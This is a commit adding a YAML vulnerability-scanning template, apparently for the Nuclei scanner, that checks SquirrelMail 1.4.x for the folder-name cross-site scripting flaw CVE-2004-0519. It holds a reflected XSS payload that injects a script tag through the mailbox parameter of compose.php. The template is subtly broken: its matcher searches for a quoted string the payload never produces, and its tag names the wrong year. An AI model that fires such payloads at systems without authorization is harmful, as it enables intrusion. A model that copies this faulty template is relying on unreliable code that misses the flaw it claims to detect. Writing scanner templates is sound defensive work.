Create CVE-2004-0519.yaml

patch-1
Dhiyaneshwaran 2021-11-15 23:44:18 +05:30 committed by GitHub
parent 8b4f86274d
commit 89501ea414
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: CVE-2004-0519
info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk
severity: medium
reference: https://www.exploit-db.com/exploits/24068
tags: xss,squirrelmail,cve2006
requests:
- method: GET
path:
- '{{BaseURL}}/mail/src/compose.php?mailbox="><script>window.alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "alert('document.domain')"
part: body
- type: word
words:
- "text/html"
part: header